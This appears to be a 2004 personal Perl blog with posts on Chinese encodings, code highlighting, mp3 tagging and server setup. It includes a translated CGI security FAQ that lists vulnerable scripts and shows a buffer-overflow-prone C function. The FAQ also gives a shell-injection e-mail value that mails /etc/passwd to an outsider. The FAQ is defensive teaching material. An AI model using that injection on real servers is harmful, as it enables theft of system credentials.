Notes on Chinese Character Encoding

23 November 2004


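Frankly, I do not understand the following very well. I am only experimenting, and this is more or less my lab record.

ord, unpack("H*"), hex, chr

my $c = "我"; # assumes this script file is saved as GBK

print unpack("H*",$c); # prints ced2, i.e. the character is encoded as \xce\xd2
print ord($c); # prints 206, the value of the first byte
print hex(substr(unpack("H*",$c),0,2)); # prints 206, hex("ce") = 206
print chr(0xce),chr(0xd2); # prints "我"; chr(0xced2) prints "旎" instead, probably because it builds the single code point U+CED2 rather than the two bytes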

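Chinese character encoding ranges

Reference article: http://www.douzi.org/weblog/archives/2004_03.html
Encoding              Byte 1      Byte 2                  Byte 3      Byte 4
GB2312                0xB0-0xF7   0xA1-0xFE
GBK                   0x81-0xFE   0x40-0xFE
GB18030 (two-byte)    0x81-0xFE   0x40-0x7E, 0x80-0xFE
GB18030 (four-byte)   0x81-0xFE   0x30-0x39               0x81-0xFE   0x30-0x39
In general GBK is what needs to be supported, and the two-byte part of GB18030 differs from GBK in only one column, XX7F. So a typical match for Chinese characters is
$chinese =~ /^(?:[\x81-\xFE][\x40-\xFE])+$/;
This does not match Chinese characters only; it also covers non-Hanzi symbols and the user-defined character area.
This stuff really is a lot of trouble.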
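
To separate real Hanzi from the symbols and user-defined characters mentioned above, one possible approach is to decode the bytes with the core Encode module and test the Unicode Han property. This is only a sketch: the helper name is_all_hanzi is made up for illustration, and the input is assumed to be GBK bytes.

```perl
use strict;
use warnings;
use Encode qw(decode);

# Hypothetical helper (not from the original notes): true when every
# character of a GBK byte string is a Han ideograph.
sub is_all_hanzi {
    my ($gbk_bytes) = @_;
    my $chars = decode('gbk', $gbk_bytes);   # GBK bytes -> Perl characters
    return $chars =~ /\A\p{Han}+\z/ ? 1 : 0;
}

print is_all_hanzi("\xCE\xD2"), "\n";   # the bytes of "我"
print is_all_hanzi("\xA1\xA1"), "\n";   # the full-width space
print is_all_hanzi("abc"), "\n";        # plain ASCII
```

Writing the test data as byte escapes keeps the example independent of the encoding the script file is saved in.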

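Filtering two common blank characters

One is the full-width space produced by Simplified Chinese input methods in full-width mode; its encoding is a1a1.
The other is a blank character that I do not know how to type, possibly from a Traditional Chinese input method; its encoding is aba7.
There is also a large area reserved for user-defined characters, and every character in it renders on a web page as a blank two bytes wide. User-name registration generally needs to filter these blanks out. I have not found that range yet.
$text =~ s/\xa1\xa1//g; # the full-width space
$text =~ s/\xab\xa7//g; # the other blank character
# or use the following combined filter
$text =~ s/(\xa1\xa1)|(\xab\xa7)//g;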
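
One caveat with byte-level substitution is that a1a1 can also appear across the boundary of two neighbouring double-byte characters (for example b0a1 followed by a1b0). A minimal sketch that avoids this walks the string one character at a time; the helper name strip_gbk_blanks is hypothetical and the text is assumed to be GBK bytes.

```perl
use strict;
use warnings;

# Hypothetical helper: remove the two blank characters from a GBK byte
# string. Every step consumes either one of the blanks, one other
# double-byte character, or one single byte, so a match can never
# straddle two characters.
sub strip_gbk_blanks {
    my ($text) = @_;
    $text =~ s/(\xa1\xa1|\xab\xa7)|([\x81-\xFE][\x40-\xFE]|.)/defined $1 ? '' : $2/gse;
    return $text;
}

print unpack("H*", strip_gbk_blanks("a\xa1\xa1b\xab\xa7c")), "\n";
print unpack("H*", strip_gbk_blanks("\xB0\xA1\xA1\xB0")), "\n";
```

The second call leaves its input untouched, whereas the plain s/\xa1\xa1//g would cut the middle out of two valid characters.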

How to Syntax-Highlight Perl Code

20 November 2004


Prerequisites

cpan Syntax::Highlight::Perl

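Code walkthrough

perldoc Syntax::Highlight::Perl
The perldoc probably explains everything clearly, but it is rather long and I did not have the patience to read it. The code from it, used as-is, produced no visible effect at all.
use Syntax::Highlight::Perl;

my $formatter = new Syntax::Highlight::Perl;
print $formatter->format_string($my_string);
I did not want to read the whole text carefully; mostly I am lazy, and reading English gives me a headache.
Fortunately I could search, and I found "Coloring perl code in HTML".
Working from that code, I changed some of the colors and rewrote its spans to use class instead of style. That makes it easier to tell which words belong to which category.
The finished code follows. Putting it to use right away, I highlighted the script with itself.
I plan to make it a new Eplanet feature later.

highlightperl.css - this CSS file can be changed freely.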

.vs { color:#080; }
.va { color:#f70; }
.vh { color:#80f; }
.vt { color:#f03; }
.sub { color:#980; }
.qr { color:#ff8000; }
.str { color:#000; }
.cm { color:#008080;font-style:italic; }
.cmp { color:#014;font-family: garamond,serif;font-size:11pt; }
.bw { color:#3A3; }
.pk { color:#900; }
.nb { color:#f0f; }
.op { color:#000; }
.sym { color:#000; }
.kw { color:#00f; }
.bo { color:#f00; }
.bf { color:#001; }
.char { color:#800; }
.dr { color:#399;font-style:italic; }
.lb { color:#939;font-style:italic; }
.ln { color:#000; }
highlight.pl
#!/usr/bin/perl -T
use strict;
use warnings;
use CGI::Carp qw(fatalsToBrowser);
use CGI qw/:standard/;

my $cgi = new CGI;
print $cgi->header;

use Syntax::Highlight::Perl;

my $color_table = {
    'Variable_Scalar'   => 'vs',
    'Variable_Array'    => 'va',
    'Variable_Hash'     => 'vh',
    'Variable_Typeglob' => 'vt',
    'Subroutine'        => 'sub',
    'Quote'             => 'qr',
    'String'            => 'str',
    'Comment_Normal'    => 'cm',
    'Comment_POD'       => 'cmp',
    'Bareword'          => 'bw',
    'Package'           => 'pk',
    'Number'            => 'nb',
    'Operator'          => 'op',
    'Symbol'            => 'sym',
    'Keyword'           => 'kw',
    'Builtin_Operator'  => 'bo',
    'Builtin_Function'  => 'bf',
    'Character'         => 'char',
    'Directive'         => 'dr',
    'Label'             => 'lb',
    'Line'              => 'ln',
};

my $formatter = Syntax::Highlight::Perl->new();

$formatter->define_substitution('<' => '&lt;',
                                '>' => '&gt;',
                                '&' => '&amp;'); # HTML escapes.

# install the formats set up above
while ( my ( $type, $class ) = each %{$color_table} ) {
	$formatter->set_format($type, [ qq~<span class=\"$class\">~, '</span>' ] );
}

print qq~<link rel="stylesheet" href="highlightperl.css" type="text/css" />~;
print '<pre>';
while (<DATA>) {
    print $formatter->format_string;
}
print "</pre>";
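
The "HTML escapes" step matters because the highlighted source is printed inside a pre element, so the three HTML-special characters must not reach the browser raw. As a stand-alone sketch of that idea (the helper name escape_html and the lookup table are made up here and are not part of Syntax::Highlight::Perl):

```perl
use strict;
use warnings;

# Hypothetical stand-alone escaping helper.
my %html_escape = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;');

sub escape_html {
    my ($text) = @_;
    # One pass over the text, so an '&' produced by an earlier
    # replacement is never escaped a second time.
    $text =~ s/([&<>])/$html_escape{$1}/g;
    return $text;
}

print escape_html('if ($a < $b && $c > 0) { ... }'), "\n";
```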

How to Set the ID3v1 Tag of mp3 Files

17 November 2004


Task

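I downloaded some songs from the web and played them in foobar2000, only to find that no song title or artist name was displayed.
MiniLyrics looks up matching lyrics by the mp3's title and artist, and fixing the files one by one is too tedious, so I decided to write a batch fix in Perl.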

Code

I searched CPAN and installed MP3::ID3v1Tag.
The module's perldoc is very clear, so I simply followed it to write this code.
The step that extracts artist, title and album is not general; parse your own file names as needed.
#!/usr/bin/perl
# usage: set the ID3v1 tag (artist, title, album) of every mp3 in one directory
use strict;
use warnings;
use MP3::ID3v1Tag;

my $dir = "E:/Music/Santana_Shaman";
opendir(DIR, $dir) or die "cannot open $dir: $!";
my @data = grep(/\.mp3$/, readdir(DIR));
closedir(DIR);

foreach my $mp3 (@data) {
	my $mp3_file = new MP3::ID3v1Tag("$dir/$mp3");
	#if($mp3_file->got_tag()) {
		# special case: the file names here look like "Santana Shaman 11 Feels Like Fire Feat DIDO.mp3"
		# parse the file name to get artist, album, track number (ignored) and title
		my ($artist, $album, undef, $title) = ($mp3 =~ /^([a-zA-Z]+)\s+([a-zA-Z]+)\s+([0-9]+)\s+(.*?)\.mp3$/);
		next unless defined $title; # skip names that do not fit the pattern
		print "$artist, $album, $title\n";
		$mp3_file->set_title($title);
		$mp3_file->set_artist($artist);
		$mp3_file->set_album($album);
		#$mp3_file->set_year(2002);
		#$mp3_file->set_genre("Latin-Rock");
		$mp3_file->save() or warn "failed to save $mp3";
	#}
}
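
Since the file-name parsing is the part that has to be adapted for every collection, it may help to pull it into a function that can be tried out without touching any mp3 file. A small sketch, using the same regular expression as the script; the name parse_mp3_name is hypothetical:

```perl
use strict;
use warnings;

# Hypothetical helper: split "Artist Album NN Title.mp3" into its parts.
# Returns an empty list when the name does not fit that pattern.
sub parse_mp3_name {
    my ($name) = @_;
    my @parts = $name =~ /^([a-zA-Z]+)\s+([a-zA-Z]+)\s+([0-9]+)\s+(.*?)\.mp3$/;
    return unless @parts;
    my ($artist, $album, $track, $title) = @parts;
    return (artist => $artist, album => $album, track => $track, title => $title);
}

my %tag = parse_mp3_name("Santana Shaman 11 Feels Like Fire Feat DIDO.mp3");
print "$tag{artist} / $tag{album} / $tag{track} / $tag{title}\n";
```

Note that the pattern only accepts a single-word artist and a single-word album, which is why it suits this directory and not file names in general.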

How to Install FastCGI

15 November 2004


Intro

This post does not cover the benefits of FastCGI; it simply describes one installation I did.
My environment: Win2000+SP4, Apache/2.0.50 (Win32) mod_perl/1.99_15-dev Perl/v5.8.4 mod_ssl/2.0.50 OpenSSL/0.9.7d PHP/4.3.7
$Apache_dir = "C:/Apache2"; $Perl_dir = "C:/usr";

Step by step

  1. Download mod_fastcgi-2.4.2-AP20.dll from http://www.fastcgi.com/dist/ (for Apache 1.3, download mod_fastcgi-2.4.2-AP13.dll instead).
  2. Follow the last section of http://www.fastcgi.com/mod_fastcgi/INSTALL:
    To install mod_fastcgi (built above or retrieved from 
    http://fastcgi.com/dist/):
    
      1. Copy the mod_fastcgi.dll to the Apache modules directory 
         (e.g. C:\Apache\modules)
    
      2. Edit the httpd configurion file (e.g. C:\Apache\conf\httpd.conf)
         and add a line like:
    
         LoadModule fastcgi_module modules/mod_fastcgi.dll
    
         Note that if there's a ClearModuleList directive after new entry,
         you'll have to either move the LoadModule after the ClearModuleList
         or add (have a look at how the other modules are handled):
    
         AddModule mod_fastcgi.c
    
      3. Edit the httpd configuration file(s) to enable your FastCGI
         application(s).  See docs/mod_fastcgi.html for details.
    
    In short:
      1. Copy mod_fastcgi.dll (the downloaded mod_fastcgi-2.4.2-AP*.dll, renamed) into the Apache modules directory
         (e.g. C:\Apache\modules).
    
      2. Add the LoadModule line quoted above to the httpd configuration file (e.g. C:\Apache\conf\httpd.conf).
         If a ClearModuleList directive appears after it, either move the LoadModule line below ClearModuleList or add the AddModule line as well (see how the other modules are handled).
    
      3. Edit the httpd configuration file to enable your FastCGI programs. See docs/mod_fastcgi.html for details.
    
  3. Visit http://www.fastcgi.com/mod_fastcgi/docs/mod_fastcgi.html and, following that document, add to httpd.conf:
    
    <Directory "E:/Fayland/fcgi-bin">
    	SetHandler fastcgi-script
    	AddHandler fastcgi-script fcg fcgi fpl
    	Options +ExecCGI
    </Directory>
    
  4. Do not download FCGI.pm-0.64-win32-x86.zip; FCGI.pm and its related files can be installed with cpan or ppm (package FCGI).
  5. Test code (E:\Fayland\fcgi-bin\test.fpl):
    #!/usr/bin/perl
    use FCGI;
    use strict;
    
    my $count = 0;
    my $request = FCGI::Request();
    
    while($request->Accept() >= 0) {
    	$count++;
    	print "Content-type:text/html\n\n";
    	print "total request $count";
    }
    
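    Visit http://localhost/fcgi-bin/test.fpl. If FastCGI is working, the count should keep rising across requests, because the same process serves them.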



WWW Security FAQ: CGI Scripts

10 November 2004


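Original URL: http://www.w3.org/Security/Faq/wwwsf4.html

Disclaimer

The information in this document is provided by Lincoln Stein ([email protected]) and John Stewart ([email protected]). The W3C hosts this document only as a service to the Web community and takes no responsibility for its contents. For further information, please contact Lincoln Stein or John Stewart directly.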

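Q1: What is the problem with CGI scripts?

The problem with CGI scripts is that each one is an opportunity for an exploitable hole. CGI scripts should be written with the same care and attention given to the server itself, because in effect they are miniature servers. Unfortunately, for most site owners CGI scripts are their first encounter with network programming.

CGI scripts can introduce security holes in two ways:

  1. They may leak information about the host system, intentionally or not, which makes a break-in easier.
  2. Scripts that process remote user input, such as the contents of a form or a "searchable index" command, are vulnerable to remote users who deliberately enter commands to be executed.

CGI scripts can be security holes even when you run the server as "nobody". A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, examine the network information maps, or start a login session on a high-numbered port (a few commands in Perl are enough for this). Even if your server runs in a chroot directory, a buggy program can leak enough system information to endanger the host.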

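Q2: Is it better to keep all CGI scripts in the cgi-bin directory than to place them anywhere in the document tree and have the server recognize them by the .cgi extension?

Although there is nothing inherently dangerous about scattering CGI scripts around the document tree, keeping them in cgi-bin is better. Because CGI scripts are such large potential security holes, it is much easier to know which scripts are installed on the system when they sit in one place than when they are spread over many directories. The advantage is even clearer in an environment with several site owners. It is all too easy for one of them to create a buggy script by accident and install it somewhere in the document tree. By restricting CGI scripts to cgi-bin and setting permissions so that only the Web administrator can install them, you avoid this chaos.

There is also the risk that a hacker manages to create a .cgi file somewhere in the document tree and then runs it by requesting its URL remotely. A cgi-bin directory with tightly controlled read and write permissions makes this less likely.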

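Q3: Are compiled languages such as C safer than interpreted languages such as Perl and shell scripts?

The answer is yes, but with many qualifications and explanations.

First there is the question of remote users obtaining the script's source code. The more a hacker knows about how a script works, the easier it is to find a hole to exploit. When a script is written in a compiled language such as C, you can compile it to a binary, place that in cgi-bin, and not worry about intruders getting the source. With an interpreted script, the source code is always potentially available. Even though a correctly configured server never returns the source of an executable script, there are many situations in which this restriction can be bypassed.

Consider the following. For convenience you decide to let the server identify CGI scripts by the .cgi extension. Later you need to make a small change to an interpreted CGI script. You open it in the Emacs text editor and edit it. Unfortunately the editor leaves a backup copy of the script source somewhere in the document tree. Although a remote user cannot get the source by fetching the script itself, he can now get the backup copy by guessing and requesting the URL:

        http://your-site/a/path/your_script.cgi~
(This is another good reason to restrict CGI scripts to cgi-bin and to keep cgi-bin separate from the document root.)

Of course, in many cases the source of a CGI script written in C is freely distributed on the Web, and the hacker's ability to steal the source is not an issue.

Another reason compiled code can be safer than interpreted code is size and complexity. Large programs, such as shells and the Perl interpreter, are likely to contain bugs. Some of those bugs may be security holes. They are there; we just do not know what they are.

A third consideration is that scripting languages make it very easy to send data to system commands and capture the output. As explained below, invoking system commands from a script is a major potential security hole. In C it takes more effort to invoke a system command, so programmers do it less often. In particular, it is very hard to write a shell script of any complexity that avoids every dangerous construct. Shell scripts are best not used for anything beyond trivial CGI programs.

Please do not take what I have said as a guarantee that compiled programs are safe. C programs can contain many exploitable holes, as the experience with NCSA httpd 1.3 and sendmail shows. To offset the problems of interpreted scripts, try to keep them short, which also makes them easier for people other than the author to understand. In addition, Perl has built-in features that catch potential security holes. For example, the taint checks (see below) catch most of the common pitfalls in CGI scripts, which can make a Perl script safer in some respects than the equivalent C program.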
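
To give an idea of what the taint checks look like in practice: when Perl runs with the -T switch, data from outside the program is marked as tainted and may not be used in commands or file operations until it has been extracted through a regular-expression capture. The following is a minimal sketch of such an untainting step; the helper name untaint_filename and the accepted character set are assumptions chosen for illustration, not part of the FAQ.

```perl
use strict;
use warnings;

# Hypothetical helper: accept only plain file names (word characters,
# dots and dashes, no leading dot, no slashes). Under -T the captured
# $1 counts as untainted, so the returned value may be used in open().
sub untaint_filename {
    my ($input) = @_;
    return unless defined $input;
    return $input =~ /\A(\w[\w.-]*)\z/ ? $1 : undef;
}

for my $candidate ('report.txt', '../etc/passwd', 'x; rm -rf /') {
    my $safe = untaint_filename($candidate);
    print defined $safe ? "ok: $safe\n" : "rejected: $candidate\n";
}
```

The pattern lists what is allowed rather than what is forbidden, which is the safer direction for this kind of check.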

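Q4: I found a good CGI script on the Web and want to install it. How can I tell whether it is safe?

You can never be sure that a script is safe. The best you can do is examine it carefully and understand what it does and how it does it. If you do not know the language the script is written in, show it to someone who does.

Things to consider when you examine a script:

  1. How complex is it? The longer it is, the more likely it is to have problems.
  2. Does it read or write files on the host system? Programs that read files may violate the access restrictions you have set up, or leak system information to hackers. Programs that write files may modify or damage documents or, worse, introduce a trojan horse into the system.
  3. Does it interact with other programs on the system? For example, many CGI scripts respond to form input by opening a pipe to the sendmail program to send e-mail. Does it do this in a safe way?
  4. Does it run with suid (set-user-id) privileges? In general this is very dangerous, and a script needs a very good reason to do it.
  5. Does the author validate all form input from the user? Checking form input is a sign that the author has thought about security.
  6. Does the author invoke external programs by explicit path names? Relying on the PATH environment variable to resolve partial path names is dangerous.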

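Q5: Which CGI scripts are known to contain security holes?

Quite a number of widely distributed CGI scripts contain known holes. Most of the holes listed here have been caught and fixed, but if you run an old version of one of these scripts you are still vulnerable. Remove it and get the latest version. If no fix exists for the script, do not use it.
HotMail
The CGI scripts that run the popular Hotmail e-mail system had a security flaw that let unauthorized individuals get into other people's e-mail accounts and read their mail. The problem is known to have affected the Hotmail version of December 1998.

Matt Wright's TextCounter versions 1.0-1.2 (Perl) and 1.0-1.3 (C++) (June 1998)
Early versions of TextCounter, which displays the number of hits on a page, fail to remove shell metacharacters from user-supplied input. As a result, remote users can run shell commands on the server host. Both the Perl and the C++ versions are affected. Upgrade to version 1.21 (Perl) or version 1.31 (C++).

Various guestbook scripts (June 1998)
At that time there were continuing reports of holes involving a variety of guestbook scripts. The first to be identified was the Selena Sol guestbook, but other scripts are affected as well. The holes exploit the fact that the scripts do not strip HTML tags from user input, so server-side includes (SSI) can be written into the guestbook file. Guestbook scripts should strip HTML tags or replace < and > with the character entities &lt; and &gt;. Alternatively, the files they write should be kept in a directory where SSI, ASP, PHP and other HTML template languages are disabled. For a detailed description of the problem, see the Selena Sol/Extropia archive at http://www.extropia.com/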

Excite Web Search Engine (EWS) version 1.1 (November 1998)
The Excite Web Search engine stores critical security information (including the encrypted administrative password) in world writable files. This allows unprivileged local users to gain access to the EWS administrative front end on both Unix and NT systems.

Note that this bug only endangers your Web site if you have the search engine installed locally. It does not affect sites that link to Excite.com's search pages, or sites that are indexed by the Excite robot.

A worse problem is found in unpatched versions of EWS earlier than February 1998 (unfortunately, also called version 1.1). This bug involves the failure to check user-supplied parameters before passing them to the shell, allowing remote users to execute shell commands on the server host. The commands will be executed with the privileges of the Web server.

See http://www.excite.com/navigate/patches.html for more information and patches.

info2www, versions 1.0-1.1
info2www, which converts GNU "info" files into Web pages, fails to check user-provided filenames before opening them. As a result, it can be tricked into opening system files or executing commands containing shell metacharacters. Versions 1.2 and higher are reported to be free of the problem, but due to the many extant versions of this script, you should probably examine the source code yourself before installing it. Also scrutinize the CGI scripts info2html and infogate, which are apparently based on info2www.

Count.cgi, versions 1.0-2.3
Count.cgi, widely used to produce page hit counts, contains a stack overflow bug that allows malicious remote users to execute Unix commands on the server by sending the script carefully crafted query strings. Version 2.4 corrects this bug. It can be found at http://www.fccc.edu/users/muquit/Count.html.

webdist.cgi, part of IRIX Mindshare Out Box versions 1.0-1.2
This script is part of a system that allows users to install and distribute software across the network. Due to inadequate checking of CGI parameters, remote users can execute commands on the server system with the permissions of the server daemon.
This bug has not been fixed as of June 12, 1997. Contact Mindshare for patches/workarounds. Until your copy of webdist.cgi is fixed, disable it by removing its execute permissions.

php.cgi, multiple versions
The php.cgi script, which provides an HTML-embedded programming language, database access, and other nice features, should never be installed in the scripts (cgi-bin) directory. Doing so allows anyone on the Internet to run shell commands on the Web server host machine. In addition, versions through 2.0b11 contain known security holes. Be sure to update to the most recent version and check the PHP site (see URL below) for other security-related news. The Apache module version of PHP, since it does not run as a CGI script, is said not to contain these holes. Nevertheless, you are encouraged to keep your system current.
http://php.iquest.net/

files.pl, part of Novell WebServer Examples Toolkit v.2
Due to a failure to check user input, the files.pl example CGI script that comes with the Novell WebServer installation allows users to view any file or directory on your system, compromising confidential documents, and potentially giving crackers the information they need to break into your system. Remove this script, and any other CGI scripts (examples or otherwise) that you do not need.

Microsoft FrontPage Extensions, versions 1.0-1.1
Under certain circumstances, unauthorized users can vandalize authorized users' files by appending to them or overwriting them. On a system with server-side includes enabled, remote users may be able to exploit this bug to execute commands on the server.
http://www.microsoft.com/security/bulletins/

nph-test-cgi, all versions
This script, included in many versions of the NCSA httpd and apache daemons, can be exploited by remote users to obtain a file listing of any directory on the Web server. It should be removed or disabled (by removing execute permissions).

nph-publish, versions 1.0-1.1
Under certain circumstances, remote users can clobber world-writable files on the server.
http://www.genome.wi.mit.edu/~lstein/server_publish/nph-publish.txt

AnyForm, version 1.0
Remote users can execute commands on the server.
http://www.uky.edu/~johnr/AnyForm2

FormMail, version 1.0
Remote users can execute commands on the server.
http://alpha.pr1.k12.co.us/~mattw/scripts.html

"phf" phone book script, distributed with NCSA httpd and Apache, all versions
Remote users can execute commands on the server.
http://hoohoo.ncsa.uiuc.edu/

To my eternal chagrin, one of the buggy CGI scripts to be discovered is in nph-publish, a script that I wrote myself to allow HTML documents to be "published" to the Apache web server from a publish-savvy editor such as Netscape Navigator Gold. I didn't check user-provided pathnames correctly, potentially allowing the script to write files into places where they aren't allowed. If the server is run with too many privileges, this can cause big problems. If you use this script, please upgrade to version 1.2 or higher. The bug was discovered by Randal Schwartz ([email protected]).

The holes in the second two scripts on the list were discovered by Paul Phillips ([email protected]), who also wrote the CGI security FAQ. The hole in the PHF (phone book) script was discovered by Jennifer Myers ([email protected]), and is representative of a potential security hole in all CGI scripts that use NCSA's util.c library. Here's a patch to fix the problem in util.c.

Reports of other buggy scripts will be posted here on an intermittent basis.

In addition, one of the scripts given as an example of "good CGI scripting" in the published book "Build a Web Site" by net.Genesis and Devra Hall contains the classic error of passing an unchecked user variable to the shell. The script in question is in Section 11.4, "Basic Search Script Using Grep", page 443. Other scripts in this book may contain similar security holes.

This list is far from complete. No centralized authority is monitoring all the CGI scripts that are released to the public; the CERT does issue alerts about buggy CGI scripts when it learns about them, and it's a good idea to subscribe to their mailing list, or to browse the alert archive from time to time (see the bibliography).

Q6: I'm developing custom CGI scripts. What unsafe practices should I avoid?

  1. Avoid giving out too much information about your site and server host.

    Although they can be used to create neat effects, scripts that leak system information are to be avoided. For example, the "finger" command often prints out the physical path to the fingered user's home directory and scripts that invoke finger leak this information (you really should disable the finger daemon entirely, preferably by removing it). The w command gives information about what programs local users are using. The ps command, in all its shapes and forms, gives would-be intruders valuable information on what daemons are running on your system.

  2. If you're coding in a compiled language like C, avoid making assumptions about the size of user input.

    A MAJOR source of security holes has been coding practices that allowed character buffers to overflow when reading in user input. Here's a simple example of the problem:

    
       #include <stdlib.h>
       #include <stdio.h>
       static char query_string[1024];
    
       char* read_POST() {
          int query_size;
          query_size=atoi(getenv("CONTENT_LENGTH"));
          fread(query_string,query_size,1,stdin);
          return query_string;
       }
    
    The problem here is that the author has made the assumption that user input provided by a POST request will never exceed the size of the static input buffer, 1024 bytes in this example. This is not good. A wily hacker can break this type of program by providing input many times that size. The buffer overflows and crashes the program; in some circumstances the crash can be exploited by the hacker to execute commands remotely.

    Here's a simple version of the read_POST() function that avoids this problem by allocating the buffer dynamically. If there isn't enough memory to hold the input, it returns NULL:

       char* read_POST() {
          int query_size=atoi(getenv("CONTENT_LENGTH"));
          char* query_string = (char*) malloc(query_size + 1);
          if (query_string != NULL) {
             size_t n = fread(query_string,1,query_size,stdin);
             query_string[n] = '\0';   /* terminate so string functions are safe */
          }
          return query_string;
       }
    
    Of course, once you've read in the data, you should continue to make sure your buffers don't overflow. Watch out for strcpy(), strcat() and other string functions that blindly copy strings until they reach the end. Use the strncpy() and strncat() calls instead.
       #define MAXSTRINGLENGTH 255
       char myString[MAXSTRINGLENGTH + 1];  /* +1 for the terminating '\0' */
       char* query = read_POST();
       assert(query != NULL);
       strncpy(myString,query,MAXSTRINGLENGTH);
       myString[MAXSTRINGLENGTH]='\0';      /* ensure string terminator */
    
    (Note that the semantics of strncpy are nasty when the input string is exactly MAXSTRINGLENGTH bytes long, leading to some necessary fiddling with the terminating NULL.)
  3. Never, never, never pass unchecked remote user input to a shell command.

    In C this includes the popen(), and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.

    Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous.

    The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.

       $mail_to = &get_name_from_input; # read the address from form
       open (MAIL,"| /usr/lib/sendmail $mail_to");
       print MAIL "To: $mail_to\nFrom: me\n\nHi there!\n";
       close MAIL;
    
    The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wily hacker passes an e-mail address that looks like this?
    
         [email protected];mail [email protected]</etc/passwd;
    
    Now the open() statement will evaluate the following command:
    
    /usr/lib/sendmail [email protected]; mail [email protected]</etc/passwd
    
    Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.
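
One way to avoid the problem shown in this example is to check the address against a strict pattern and to start sendmail without going through a shell at all. The following is only a sketch under stated assumptions: the helper names is_plain_address and send_greeting are made up, the pattern is deliberately narrower than real e-mail syntax, and the sendmail path with the -t and -oi options is assumed to fit the local system.

```perl
use strict;
use warnings;

# Hypothetical validator: a strict allow-list pattern, not a full
# e-mail address parser.
sub is_plain_address {
    my ($addr) = @_;
    return $addr =~ /\A[\w.+-]+\@[\w-]+(?:\.[\w-]+)+\z/ ? 1 : 0;
}

# Sketch only: sends a fixed greeting to a validated address.
sub send_greeting {
    my ($mail_to) = @_;
    die "suspicious address\n" unless is_plain_address($mail_to);
    # List-form pipe open: sendmail is executed directly, no /bin/sh is
    # involved, and the recipient is read from the To: header (-t)
    # instead of the command line.
    open(my $mail, '|-', '/usr/lib/sendmail', '-t', '-oi')
        or die "cannot run sendmail: $!";
    print {$mail} "To: $mail_to\nFrom: me\n\nHi there!\n";
    close($mail) or warn "sendmail exited abnormally\n";
}

print is_plain_address('user@example.com'), "\n";
print is_plain_address('a@example.com;mail b@example.org</etc/passwd;'), "\n";
```

Either measure alone already blocks the attack above; using both means a mistake in one is covered by the other.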

Ultimately it's up to you to examine each script and make sure that it's not doing anything unsafe.


$Id: wwwsf4.html,v 1.11 2003/02/23 22:46:27 lstein Exp $

utf8 and gb2312 Encoding

09 November 2004


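    Questions:
  1. Convert a file of gb2312 data to utf8
  2. Display a gb2312 data file under the utf8 charset
  3. Generate a utf8 data file directly
  4. No file reading involved: print "中文"; inside the script file
The key statement is really just:
use Encode qw/encode decode/;
my $utf_data = encode("utf8", decode("gb2312", $data));
# $data is gb2312, $utf_data is utf8
Equivalent code:
use Encode qw/from_to/;
from_to($data, "gb2312", "utf8");
# $data is converted in place from gb2312 to utf8
The reverse, from utf8 to gb2312, works as well; just swap the arguments of encode and decode.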
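
To see the two forms side by side without depending on how the script file itself is saved, the sample character can be written as byte escapes. This is a small sketch using only the core Encode module; the bytes ce d2 are "我" in gb2312.

```perl
use strict;
use warnings;
use Encode qw(encode decode from_to);

my $gb = "\xCE\xD2";                       # "我" as gb2312 bytes

# Two-step form: bytes -> Perl characters -> bytes.
my $utf8 = encode("utf8", decode("gb2312", $gb));
print unpack("H*", $utf8), "\n";

# In-place form: from_to() overwrites its first argument.
my $data = $gb;
from_to($data, "gb2312", "utf8");
print unpack("H*", $data), "\n";

# And back again, with the encoding names swapped.
from_to($data, "utf8", "gb2312");
print unpack("H*", $data), "\n";
```

Printing with unpack("H*", ...) shows the raw bytes, so the result can be checked regardless of the terminal's own encoding.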

Example and code:
gb.dat is a file of gb2312 data. With -charset=>'utf-8' it displays as garbage; with gb2312 it displays correctly.


#!/usr/bin/perl
use strict;
use CGI::Carp qw(fatalsToBrowser);
use CGI qw/:standard/;
use Encode qw/encode decode from_to/;

my $cgi = new CGI;
# charset utf8
print $cgi->header(-type=>'text/html',-charset=>'utf-8');

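# open the gb2312 file and read all of it
open(FH, "<", "gb.dat") or die "cannot open gb.dat: $!";
my $data = do { local $/; <FH> };
close(FH);

# convert gb2312 to utf8
my $utf_data = encode("utf8", decode("gb2312", $data));

# produce the utf8 file
open(FH, ">", "utf8.dat") or die "cannot write utf8.dat: $!";
print FH $utf_data;
close(FH);

my $word = "我是中国人"; # this script file itself is assumed to be saved as gb2312
from_to($word, "gb2312", "utf8");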

print "$utf_data, $word";
After the conversion, utf8.dat can be read directly under -charset=>'utf-8' without another decode/encode.
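
Another way to do the same conversion is to let PerlIO encoding layers do the decoding and encoding while reading and writing. The sketch below uses in-memory filehandles so that it runs without any files on disk; in a real script the scalar references would be replaced by the file names gb.dat and utf8.dat.

```perl
use strict;
use warnings;

my $gb_bytes = "\xCE\xD2\n";               # stands in for the contents of gb.dat

# Read through a decoding layer: lines arrive as Perl characters.
open(my $in, '<:encoding(gb2312)', \$gb_bytes) or die "open for read failed: $!";
my @lines = <$in>;
close($in);

# Write through an encoding layer: characters leave as UTF-8 bytes.
my $utf8_bytes = '';
open(my $out, '>:encoding(UTF-8)', \$utf8_bytes) or die "open for write failed: $!";
print {$out} @lines;
close($out);

print unpack("H*", $utf8_bytes), "\n";
```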

No file reading involved: print "中文"; inside the script file

In script.pl, add use encoding "euc-cn", STDOUT => "utf8";
use CGI qw/:standard/;
use encoding "euc-cn", STDOUT => "utf8";

my $cgi = new CGI;
print $cgi->header(-type=>'text/html',-charset=>'utf-8');

print "我是中国人,我爱野文";



Maypole

31 October 2004


OS: Win2000 SP4
Apache: C:\Apache2
Perl: C:\usr
Installed from Perl-5.8-win32-bin.exe.
Apache/2.0.50 (Win32) mod_perl/1.99_15-dev Perl/v5.8.4

First open cmd and run cpan Maypole.
It installs a series of prerequisite modules; everything went smoothly.
Then copy .cpan/build/Maypole-2.04/ex/BeerDB.pm to C:/usr/site/lib.
Edit conf/perl.conf and append:
# Maypole
Alias /beerdb/ "E:/Fayland/beerdb/"
<Location /beerdb>
  SetHandler perl-script
  PerlHandler BeerDB
</Location>
Next edit BeerDB.pm and change its database connection settings.
BeerDB->setup("dbi:mysql:beerdb","user","pass");
